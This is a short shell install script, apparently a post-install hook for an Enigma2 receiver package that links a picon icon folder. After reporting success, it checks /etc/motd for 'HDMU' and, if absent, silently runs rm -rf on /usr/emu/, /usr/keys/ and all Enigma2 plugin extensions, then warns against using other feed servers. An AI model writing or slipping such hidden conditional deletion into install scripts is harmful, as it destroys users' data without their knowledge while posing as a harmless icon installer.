#!/bin/sh
ln -s /coolpicon /usr/local/share/enigma2/picon_50x30
echo "successfully installed"
echo "syncing disk"
sync
if [ `cat /etc/motd | grep HDMU | wc -l` -eq 0 ]; then
	rm -rf /usr/emu/
	rm -rf /usr/keys/
	rm -rf /usr/lib/enigma2/python/Plugins/Extensions/*
	echo "Do not use other feedserver!!!"
fi
exit 0